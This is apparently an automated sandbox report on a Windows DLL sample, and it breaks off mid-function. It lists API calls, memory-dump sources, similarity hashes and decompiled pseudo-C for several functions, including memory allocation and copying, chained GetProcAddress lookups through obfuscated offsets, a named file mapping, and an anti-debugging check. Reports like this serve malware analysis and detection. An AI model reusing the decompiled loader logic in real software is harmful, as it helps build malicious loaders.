                                    0x6e1d1628
                                    0x6e1d1673
                                    0x6e1d1680
                                    0x6e1d1695
                                    0x6e1d1682
                                    0x6e1d168b
                                    0x6e1d1690
                                    0x6e1d16a6
                                    0x6e1d16a6
                                    0x6e1d16b5
                                    0x6e1d16bb

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1D15F9
                                    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1D17EC), ref: 6E1D168B
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1D16A6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Virtual$AllocFreememcpy
                                    • String ID: Mar 26 2021
                                    • API String ID: 4010158826-2175073649
                                    • Opcode ID: 2a59bf677c80a96e1e6a629b15973291b424796aa40ea96af8dba623576ff620
                                    • Instruction ID: 36d1527fb572195886cb7accfefc202a0f410927e916787f6b838ea9cc58b389
                                    • Opcode Fuzzy Hash: 2a59bf677c80a96e1e6a629b15973291b424796aa40ea96af8dba623576ff620
                                    • Instruction Fuzzy Hash: D7313071E4061AAFDF00CF99C880ADEBBB9FF49304F148169D514E7245E771AA4A9F90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E1D1D32(void* __ecx, intOrPtr _a4) {
                                    				long _t3;
                                    				int _t4;
                                    				int _t9;
                                    				void* _t13;
                                    
                                    				_t13 = GetCurrentThread();
                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                    				if(_t3 != 0) {
                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                    				}
                                    				_t4 = E6E1D17A7(_a4); // executed
                                    				_t9 = _t4;
                                    				if(_t9 == 0) {
                                    					SetThreadPriority(_t13, _t4);
                                    				}
                                    				asm("lock xadd [eax], ecx");
                                    				return _t9;
                                    			}







                                    0x6e1d1d3b
                                    0x6e1d1d40
                                    0x6e1d1d4e
                                    0x6e1d1d53
                                    0x6e1d1d53
                                    0x6e1d1d59
                                    0x6e1d1d5e
                                    0x6e1d1d62
                                    0x6e1d1d66
                                    0x6e1d1d66
                                    0x6e1d1d70
                                    0x6e1d1d79

                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 6E1D1D35
                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1D1D40
                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1D1D53
                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1D1D66
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Thread$Priority$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1452675757-0
                                    • Opcode ID: 3f7e41d162a5217541b32f8634b09f35e244071314e4455f7b5eea3eb97db63f
                                    • Instruction ID: e990fd9f5bfde88352b6533d65000baff1717d25945569ae1092a6561cc70cfa
                                    • Opcode Fuzzy Hash: 3f7e41d162a5217541b32f8634b09f35e244071314e4455f7b5eea3eb97db63f
                                    • Instruction Fuzzy Hash: 9DE09231316B152BA7022A694C8CEAFAB5CDF933357110335F524D21D0DB549C4EA5A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __encode_pointer.LIBCMTD ref: 6E212B27
                                      • Part of subcall function 6E212A50: TlsGetValue.KERNEL32(6E29C234,00000000), ref: 6E212A65
                                      • Part of subcall function 6E212A50: TlsGetValue.KERNEL32(6E29C234,6E29C230), ref: 6E212A86
                                      • Part of subcall function 6E212A50: __crt_wait_module_handle.LIBCMTD ref: 6E212A9C
                                      • Part of subcall function 6E212A50: GetProcAddress.KERNEL32(00000000,6E2692EC), ref: 6E212AB6
                                      • Part of subcall function 6E212A50: RtlEncodePointer.NTDLL(?), ref: 6E212AD7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                                    • String ID:
                                    • API String ID: 568403282-0
                                    • Opcode ID: 3c7ee718fe0a70fa201be2b3f7fa82a5cabb4accedd3dd1403c11f2375cd5494
                                    • Instruction ID: f6256935d26da0a7d9e4b275ede5b468de832ef32f6017b2302cd220aaf19b24
                                    • Opcode Fuzzy Hash: 3c7ee718fe0a70fa201be2b3f7fa82a5cabb4accedd3dd1403c11f2375cd5494
                                    • Instruction Fuzzy Hash: 5CA012A748820C23D11011C23802B53354D43C1538E090020F60D061412842A5114093
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 6E20A8FD
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E20A914
                                    • UnhandledExceptionFilter.KERNEL32(6E26835C), ref: 6E20A91F
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 6E20A93D
                                    • TerminateProcess.KERNEL32(00000000), ref: 6E20A944
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: a0c86f704a370907edba58d307914d565b82c8a3b084815a7e55ea22994224dd
                                    • Instruction ID: 83ab946d28fd65985b0f361cb13a7e02433566af23b0bcc5efd6ff7c715203b6
                                    • Opcode Fuzzy Hash: a0c86f704a370907edba58d307914d565b82c8a3b084815a7e55ea22994224dd
                                    • Instruction Fuzzy Hash: DD21CDB8800A08DFCF40EFA9D54DA9D7BB7BB0A314F44515AE90897340F7B16985CF66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E6E1D1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                    				intOrPtr _v12;
                                    				struct _FILETIME* _v16;
                                    				short _v60;
                                    				struct _FILETIME* _t14;
                                    				intOrPtr _t15;
                                    				long _t18;
                                    				void* _t22;
                                    				intOrPtr _t31;
                                    				long _t32;
                                    				void* _t34;
                                    
                                    				_t31 = __edx;
                                    				_t14 =  &_v16;
                                    				GetSystemTimeAsFileTime(_t14);
                                    				_push(0x192);
                                    				_push(0x54d38000);
                                    				_push(_v12);
                                    				_push(_v16);
                                    				L6E1D2210();
                                    				_push(_t14);
                                    				_v16 = _t14;
                                    				_t15 =  *0x6e1d41d0;
                                    				_push(_t15 + 0x6e1d505e);
                                    				_push(_t15 + 0x6e1d5054);
                                    				_push(0x16);
                                    				_push( &_v60);
                                    				_v12 = _t31;
                                    				L6E1D220A();
                                    				_t18 = _a4;
                                    				if(_t18 == 0) {
                                    					_t18 = 0x1000;
                                    				}
                                    				_t34 = CreateFileMappingW(0xffffffff, 0x6e1d41c0, 4, 0, _t18,  &_v60);
                                    				if(_t34 == 0) {
                                    					_t32 = GetLastError();
                                    				} else {
                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                    						if(_t22 == 0) {
                                    							_t32 = GetLastError();
                                    							if(_t32 != 0) {
                                    								goto L9;
                                    							}
                                    						} else {
                                    							 *_a8 = _t34;
                                    							 *_a12 = _t22;
                                    							_t32 = 0;
                                    						}
                                    					} else {
                                    						_t32 = 2;
                                    						L9:
                                    						CloseHandle(_t34);
                                    					}
                                    				}
                                    				return _t32;
                                    			}













                                    0x6e1d1979
                                    0x6e1d1982
                                    0x6e1d1986
                                    0x6e1d198c
                                    0x6e1d1991
                                    0x6e1d1996
                                    0x6e1d1999
                                    0x6e1d199c
                                    0x6e1d19a1
                                    0x6e1d19a2
                                    0x6e1d19a5
                                    0x6e1d19b0
                                    0x6e1d19b7
                                    0x6e1d19bb
                                    0x6e1d19bd
                                    0x6e1d19be
                                    0x6e1d19c1
                                    0x6e1d19c6
                                    0x6e1d19d0
                                    0x6e1d19d2
                                    0x6e1d19d2
                                    0x6e1d19ec
                                    0x6e1d19f0
                                    0x6e1d1a40
                                    0x6e1d19f2
                                    0x6e1d19fb
                                    0x6e1d1a11
                                    0x6e1d1a19
                                    0x6e1d1a2b
                                    0x6e1d1a2f
                                    0x00000000
                                    0x00000000
                                    0x6e1d1a1b
                                    0x6e1d1a1e
                                    0x6e1d1a23
                                    0x6e1d1a25
                                    0x6e1d1a25
                                    0x6e1d1a06
                                    0x6e1d1a08
                                    0x6e1d1a31
                                    0x6e1d1a32
                                    0x6e1d1a32
                                    0x6e1d19fb
                                    0x6e1d1a48

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?,?), ref: 6E1D1986
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1D199C
                                    • _snwprintf.NTDLL ref: 6E1D19C1
                                    • CreateFileMappingW.KERNEL32(000000FF,6E1D41C0,00000004,00000000,?,?), ref: 6E1D19E6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D19FD
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1D1A11
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D1A29
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A), ref: 6E1D1A32
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D176E,0000000A,?), ref: 6E1D1A3A
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1724014008-0
                                    • Opcode ID: fb8d8848de815a7267ba500a44b5efb43bc6c14f6be3e4d667a183ac02b36403
                                    • Instruction ID: 4e63b4ae8bb16e40770931ba6e81826a07430c7c649393e89cea205692b91b0a
                                    • Opcode Fuzzy Hash: fb8d8848de815a7267ba500a44b5efb43bc6c14f6be3e4d667a183ac02b36403
                                    • Instruction Fuzzy Hash: D021D3B2600148BFDB00AFD8DC88EDE77BCEB45354F218025F615E7180D6705889EB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchroperator!=$Stolx
                                    • String ID:
                                    • API String ID: 3353032694-0
                                    • Opcode ID: ccb1e968dc82828f30ffd14cbd7407f544e300a6dd40d22551d87fe0a69a5f88
                                    • Instruction ID: 44f9a27839a2548d6008e41e0e58c199ae80c655c043a9b0316ce00c710a9da6
                                    • Opcode Fuzzy Hash: ccb1e968dc82828f30ffd14cbd7407f544e300a6dd40d22551d87fe0a69a5f88
                                    • Instruction Fuzzy Hash: 70718575D00559ABDB04CFE9E890AEEB7B5AF98304F24C019FC65AB781D7309981DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                    				intOrPtr _v8;
                                    				_Unknown_base(*)()* _t29;
                                    				_Unknown_base(*)()* _t33;
                                    				_Unknown_base(*)()* _t36;
                                    				_Unknown_base(*)()* _t39;
                                    				_Unknown_base(*)()* _t42;
                                    				intOrPtr _t46;
                                    				struct HINSTANCE__* _t50;
                                    				intOrPtr _t56;
                                    
                                    				_t56 = E6E1D1C8F(0x20);
                                    				if(_t56 == 0) {
                                    					_v8 = 8;
                                    				} else {
                                    					_t50 = GetModuleHandleA( *0x6e1d41d0 + 0x6e1d5014);
                                    					_v8 = 0x7f;
                                    					_t29 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50e1);
                                    					 *(_t56 + 0xc) = _t29;
                                    					if(_t29 == 0) {
                                    						L8:
                                    						E6E1D136A(_t56);
                                    					} else {
                                    						_t33 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d50f1);
                                    						 *(_t56 + 0x10) = _t33;
                                    						if(_t33 == 0) {
                                    							goto L8;
                                    						} else {
                                    							_t36 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5104);
                                    							 *(_t56 + 0x14) = _t36;
                                    							if(_t36 == 0) {
                                    								goto L8;
                                    							} else {
                                    								_t39 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d5119);
                                    								 *(_t56 + 0x18) = _t39;
                                    								if(_t39 == 0) {
                                    									goto L8;
                                    								} else {
                                    									_t42 = GetProcAddress(_t50,  *0x6e1d41d0 + 0x6e1d512f);
                                    									 *(_t56 + 0x1c) = _t42;
                                    									if(_t42 == 0) {
                                    										goto L8;
                                    									} else {
                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                    										_t46 = E6E1D18D1(_t56, _a12);
                                    										_v8 = _t46;
                                    										if(_t46 != 0) {
                                    											goto L8;
                                    										} else {
                                    											 *_a16 = _t56;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}












                                    0x6e1d1ab3
                                    0x6e1d1ab7
                                    0x6e1d1b78
                                    0x6e1d1abd
                                    0x6e1d1ad5
                                    0x6e1d1ae4
                                    0x6e1d1aeb
                                    0x6e1d1aef
                                    0x6e1d1af2
                                    0x6e1d1b70
                                    0x6e1d1b71
                                    0x6e1d1af4
                                    0x6e1d1b01
                                    0x6e1d1b05
                                    0x6e1d1b08
                                    0x00000000
                                    0x6e1d1b0a
                                    0x6e1d1b17
                                    0x6e1d1b1b
                                    0x6e1d1b1e
                                    0x00000000
                                    0x6e1d1b20
                                    0x6e1d1b2d
                                    0x6e1d1b31
                                    0x6e1d1b34
                                    0x00000000
                                    0x6e1d1b36
                                    0x6e1d1b43
                                    0x6e1d1b47
                                    0x6e1d1b4a
                                    0x00000000
                                    0x6e1d1b4c
                                    0x6e1d1b52
                                    0x6e1d1b58
                                    0x6e1d1b5d
                                    0x6e1d1b64
                                    0x6e1d1b67
                                    0x00000000
                                    0x6e1d1b69
                                    0x6e1d1b6c
                                    0x6e1d1b6c
                                    0x6e1d1b67
                                    0x6e1d1b4a
                                    0x6e1d1b34
                                    0x6e1d1b1e
                                    0x6e1d1b08
                                    0x6e1d1af2
                                    0x6e1d1b86

                                    APIs
                                      • Part of subcall function 6E1D1C8F: HeapAlloc.KERNEL32(00000000,?,6E1D117D,?,00000000,00000000,?,?,?,6E1D1810), ref: 6E1D1C9B
                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1D1272,?,?,?,?), ref: 6E1D1AC9
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1AEB
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B01
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B17
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B2D
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1D1B43
                                      • Part of subcall function 6E1D18D1: memset.NTDLL ref: 6E1D1950
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: AddressProc$AllocHandleHeapModulememset
                                    • String ID:
                                    • API String ID: 426539879-0
                                    • Opcode ID: f284ad02a2944e0a1d5907a02e65cfecae697a1471b10e89578309478a033115
                                    • Instruction ID: 457e5bfffa5ffeec816dbe5d657a70d252851e625ac9e60ce254a52370896398
                                    • Opcode Fuzzy Hash: f284ad02a2944e0a1d5907a02e65cfecae697a1471b10e89578309478a033115
                                    • Instruction Fuzzy Hash: C3216DB160170BDFDB40EFA9C880E5A7BFCFB55284B114525E885D7251E730E949EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___initconout.LIBCMTD ref: 6E231E54
                                      • Part of subcall function 6E23A360: CreateFileA.KERNEL32(6E26FDFC,40000000,00000003,00000000,00000003,00000000,00000000,?,6E231E59), ref: 6E23A379
                                    • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E231ED9
                                    • WideCharToMultiByte.KERNEL32(00000000), ref: 6E231EE0
                                    • WriteConsoleA.KERNEL32(6E29CB50,00000000,?,?,00000000), ref: 6E231F07
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                                    • String ID:
                                    • API String ID: 3432720595-0
                                    • Opcode ID: de351a5dd7711895de9ce1ad4439da0929a78e9276ce4175991f5590bf6111be
                                    • Instruction ID: 2dc1c71a2292708d8994d89f0a9e6c4579e2e5581bd38848d7703f31ab87b196
                                    • Opcode Fuzzy Hash: de351a5dd7711895de9ce1ad4439da0929a78e9276ce4175991f5590bf6111be
                                    • Instruction Fuzzy Hash: 4621B1B8518619EFDF10CFE5C85ABAA337ABB06B11F604329E1058A1C4D77055C9DFB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunct$_memmove_s
                                    • String ID: @
                                    • API String ID: 1173002688-2766056989
                                    • Opcode ID: a0b5220b89f55b11557bb22e618a5aed2394f1c43c716bda71601f23200ae3ab
                                    • Instruction ID: c5da17add395d3183457adf6c27f171ecf6239b4410b16d0afaec03e21d011f6
                                    • Opcode Fuzzy Hash: a0b5220b89f55b11557bb22e618a5aed2394f1c43c716bda71601f23200ae3ab
                                    • Instruction Fuzzy Hash: 45C13AB1904549DFCB04CF98C990AEEBBFABF88304F248659F919A7351D734A981DF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunct$_memmove_s
                                    • String ID: @
                                    • API String ID: 1173002688-2766056989
                                    • Opcode ID: 468e85a2134b476da882d11d8a89329d480821abf810bce16ccca35a35f79929
                                    • Instruction ID: 58909087214a5992b4ed1de5ccf2bd790da5b246125c58b92446def811aed67f
                                    • Opcode Fuzzy Hash: 468e85a2134b476da882d11d8a89329d480821abf810bce16ccca35a35f79929
                                    • Instruction Fuzzy Hash: 62C13CB19045499FCB04CF98C990AEEBBF9BF88304F24865DF915AB351D734A941DF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _Debug_pointer.LIBCPMTD ref: 6E1E67E7
                                    • __cftoe.LIBCMTD ref: 6E1E6898
                                      • Part of subcall function 6E1EF5B0: std::_Iterator_base::_Has_container.LIBCPMTD ref: 6E1EF5C9
                                      • Part of subcall function 6E1EF5B0: __invalid_parameter.LIBCMTD ref: 6E1EF610
                                      • Part of subcall function 6E1EF5B0: __invalid_parameter.LIBCMTD ref: 6E1EF689
                                      • Part of subcall function 6E1E7840: char_traits.LIBCPMTD ref: 6E1E7879
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: __invalid_parameter$Debug_pointerHas_containerIterator_base::___cftoechar_traitsstd::_
                                    • String ID: !%x
                                    • API String ID: 3269705901-1893981228
                                    • Opcode ID: 4ade868d87e73087c7a066b216cad3b24fb2e29f5dfc815ef46204e8c0716db1
                                    • Instruction ID: 0e1a1ce9822c7def3210d72e412f62947629cc8b27adf67772037e241cf2351c
                                    • Opcode Fuzzy Hash: 4ade868d87e73087c7a066b216cad3b24fb2e29f5dfc815ef46204e8c0716db1
                                    • Instruction Fuzzy Hash: 9B916CB0D0064CDFCB04CFE4C990BEEBBB9BF59304F508599E555A7281EB306A85DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 802bd2f8e7dae22120f17265a375fb4020ebd7e00cd6193d551c774f84e68a1d
                                    • Instruction ID: 00ad92646d65189c77129ce3e0691a92ca4cb2a3dd4c6337e7d30a784f6df227
                                    • Opcode Fuzzy Hash: 802bd2f8e7dae22120f17265a375fb4020ebd7e00cd6193d551c774f84e68a1d
                                    • Instruction Fuzzy Hash: F8616AB1D00A0DDBDB04CF95D954BEE77B8FF49300F008199E998A6281CB389AE6DB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 3763dd0198a22e740968f8eb02dba5c95451a9edb26fb3d1f4c8fc898d2c966e
                                    • Instruction ID: d5a8e3bc618be1287ecc5bd62ea78413a07cd923f3bdea482ff38d842e3916fe
                                    • Opcode Fuzzy Hash: 3763dd0198a22e740968f8eb02dba5c95451a9edb26fb3d1f4c8fc898d2c966e
                                    • Instruction Fuzzy Hash: CB617871D00A0DDBDF04CF94D954BEEBBB8FF45300F008098E999A6281DB789AE5DB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: e54ac525aedc774d04310ef295481fe2038d3d938276f738b3e14c0f8cefa6d7
                                    • Instruction ID: b77d12692c4369d150a48c9bb582d05291def4b83e34f9e491d4731e94dcad50
                                    • Opcode Fuzzy Hash: e54ac525aedc774d04310ef295481fe2038d3d938276f738b3e14c0f8cefa6d7
                                    • Instruction Fuzzy Hash: FC515A71900A0DDFDB04CF94D954BEEB7B5FF85304F008199E998A6281DB389AE5DF11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 0b279fb5c3c0358f73807fa792b16f80f3baf16c4320b78a5ec25f64b2970c4d
                                    • Instruction ID: f0f48a7387850d4335e722cf3758a5417c27ffebdab657ef6f785032bf91ad95
                                    • Opcode Fuzzy Hash: 0b279fb5c3c0358f73807fa792b16f80f3baf16c4320b78a5ec25f64b2970c4d
                                    • Instruction Fuzzy Hash: 01517A70900A1DDFDB14CF94D954BEE7BB4FF89300F008198E599A6281CB389AE6DF15
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchr$_swprintf_s
                                    • String ID: (
                                    • API String ID: 86255702-3887548279
                                    • Opcode ID: 061df63c74322e05148636d3be89062f63ad5091920dcd82990aafd042ab1140
                                    • Instruction ID: 881665c91a49429de72ff9a651aec528b6c61d3d6478a72ef5c5947847155633
                                    • Opcode Fuzzy Hash: 061df63c74322e05148636d3be89062f63ad5091920dcd82990aafd042ab1140
                                    • Instruction Fuzzy Hash: 78419AB090060CDBCB04CFD5D955BEEBBB9FF48304F104619F8996B680DB34AA44DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchr$_swprintf_s
                                    • String ID: (
                                    • API String ID: 86255702-3887548279
                                    • Opcode ID: c7fbc97dbdc015dc96fa869edc3a939eb05d3976410782802a33e775a52607cc
                                    • Instruction ID: fe40693d22f74aeb485edcc5613cb65535a7cdf642fe32877afd85a656b0f583
                                    • Opcode Fuzzy Hash: c7fbc97dbdc015dc96fa869edc3a939eb05d3976410782802a33e775a52607cc
                                    • Instruction Fuzzy Hash: 0341ACB090060CDBCB04CFD5D955BEEBBB8FF48304F104619F899AB680DB34AA58DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunctshared_ptr
                                    • String ID:
                                    • API String ID: 3707918647-0
                                    • Opcode ID: 4f23e73f7b870a0eaba29616fb2add3cc25ae99a879677491f8fe58c52e2e854
                                    • Instruction ID: 147b03d82c728b756accec5b16f19731ac52b12236c2cad689237a467cfd004d
                                    • Opcode Fuzzy Hash: 4f23e73f7b870a0eaba29616fb2add3cc25ae99a879677491f8fe58c52e2e854
                                    • Instruction Fuzzy Hash: 758117B1900209DFDB14CFD4C894BEEB7B9BF58304F108699E519AB294DB30AE85DF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Locinfo::_Getdays.LIBCPMTD ref: 6E1EF1B9
                                    • _Maklocstr.LIBCPMTD ref: 6E1EF1CE
                                      • Part of subcall function 6E1ED120: _strlen.LIBCMT ref: 6E1ED133
                                    • std::_Locinfo::_Getmonths.LIBCPMTD ref: 6E1EF1E5
                                    • _Maklocstr.LIBCPMTD ref: 6E1EF1FA
                                      • Part of subcall function 6E1EB6F0: __Getdateorder.LIBCPMTD ref: 6E1EB6F9
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462987136.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Locinfo::_Maklocstrstd::_$GetdateorderGetdaysGetmonths_strlen
                                    • String ID:
                                    • API String ID: 3206958346-0
                                    • Opcode ID: f9c0ca9df8dff7bee54103fbcaf2a7fe482731e8084a0e9ee1c70f9d30900e34
                                    • Instruction ID: 2a58355025094928a30b75318dbfcae314b97a60df71f8d97728a652a582adbe
                                    • Opcode Fuzzy Hash: f9c0ca9df8dff7bee54103fbcaf2a7fe482731e8084a0e9ee1c70f9d30900e34
                                    • Instruction Fuzzy Hash: D831EBB5D006099FCB04CF99C890AAEFBB5FB48314F10866AE815A7381D7359941CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D146C() {
                                    				void* _t1;
                                    				long _t3;
                                    				void* _t4;
                                    				long _t5;
                                    				void* _t6;
                                    				intOrPtr _t8;
                                    
                                    				_t8 =  *0x6e1d41b0;
                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                    				 *0x6e1d41bc = _t1;
                                    				if(_t1 == 0) {
                                    					return GetLastError();
                                    				}
